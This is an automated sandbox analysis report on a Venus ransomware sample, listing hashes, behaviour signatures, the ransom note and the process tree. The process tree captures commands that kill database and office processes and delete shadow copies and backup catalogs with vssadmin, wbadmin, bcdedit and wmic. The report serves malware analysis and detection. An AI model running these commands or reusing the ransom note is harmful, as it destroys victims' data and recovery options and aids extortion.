Overview

overview

10

Static

static

10

0a1dbcff63...be.exe

windows7-x64

10

0a1dbcff63...be.exe

windows10-1703-x64

10

0a1dbcff63...be.exe

windows10-2004-x64

10

0a1dbcff63...be.exe

windows11-21h2-x64

10

Resubmissions

01-04-2024 16:38

240401-t5wxbaab86 10

01-04-2024 03:29

240401-d17v1scd5z 10

Analysis

  • max time kernel
    129s
  • max time network
    137s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-04-2024 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe

  • Size

    225KB

  • MD5

    8691dae21568faaeda49bcd640e1ad23

  • SHA1

    524b589ef403ff21cf040ef33c21b1d6d8235feb

  • SHA256

    0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be

  • SHA512

    870aedf4a6ee62cbfdc4c094ddf3da08fb603dc248e36baa9ae833b5f22e930650f97b7d1d1a78787c5ae40e03d131b1814ca34a7264cc9b311cb92f2f1eb30d

  • SSDEEP

    6144:2NRgzJmXrQwAPj5XJkcXV50DErs5xgTw7ozFz254W:URglerQwAjkzDZGcoxfW

Score
10/10
venusevasionpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\6201477221972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] email:[email protected]
Emails

email:[email protected]

email:[email protected]

Signatures

  • Venus

    Venus is a ransomware first seen in 2022.

    ransomwarevenus
  • Venus Ransomware 4 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Renames multiple (8247) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 36 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe
    "C:\Users\Admin\AppData\Local\Temp\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Windows\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe
      "C:\Windows\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1308
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:7516
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:8028
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:8140
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:8752
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:9300
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6201477221972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:6708
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:4932
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:8088
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6984
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:7200
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:8100

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml
        Filesize

        3.3MB

        MD5

        2ec839a9dcc1e2db373c78321d46413b

        SHA1

        b94fbe966c285f5e0d51b759a64334eefd3f2425

        SHA256

        ae1cba29b61696cb40ef2d1f72587489ce64a88815a9004d82dba222dcd1d50b

        SHA512

        bc35aeadc78d5bd005ccaa5983c1cb62f1b46021d3fe4a6124144fb805c56dd098cffc0a1f43e622082b85fca2f035e52ef4f9edef1e5b158e2f02809a96238b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\6201477221972527219.hta
        Filesize

        1KB

        MD5

        8b21851812e49cf5fdf41f27f86ed7ed

        SHA1

        9f0508f620125a3b2c65583526605595d5573871

        SHA256

        5319b9b9a47498219a6a17c5a8da3065dc101d96b8319c4ec238cedd10071c0b

        SHA512

        42f77c979020d5c34fe3590cf40405bc2ec3b4fe6b2aebe92b1f3f48f327315b854b2941f7e15f3b61d6b62ce8fd357c942ee7f183112a0d718a9c0b671412af

        Download Submit

      • C:\Windows\0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be.exe
        Filesize

        225KB

        MD5

        8691dae21568faaeda49bcd640e1ad23

        SHA1

        524b589ef403ff21cf040ef33c21b1d6d8235feb

        SHA256

        0a1dbcff63619c4d9072484bb17b3d06300504e836e42df98eadf57e7ad0d0be

        SHA512

        870aedf4a6ee62cbfdc4c094ddf3da08fb603dc248e36baa9ae833b5f22e930650f97b7d1d1a78787c5ae40e03d131b1814ca34a7264cc9b311cb92f2f1eb30d

        Download Submit

      • \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-3360119756-166634443-3920521668-1000\desktop.ini.venus
        Filesize

        276B

        MD5

        d65c8291b67c26406876e2aeb583b6cf

        SHA1

        f126aa0428866ca01bf6a6af6426c1152f30db3f

        SHA256

        425f4f37406c6cf093a7eb7c5971b16a67ee4220b7e7ff39f74754bf78c81b35

        SHA512

        6ce179b2827f5d09b1801f51b6254ba7d3609755f01836b54b97fd5cf677124136c653deaf0371ee50d77c2d25a6bbe59401c31254d8dc47f0227b71c90c7120

        Download Submit

      • memory/2168-0-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/2168-30-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/2348-5024-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download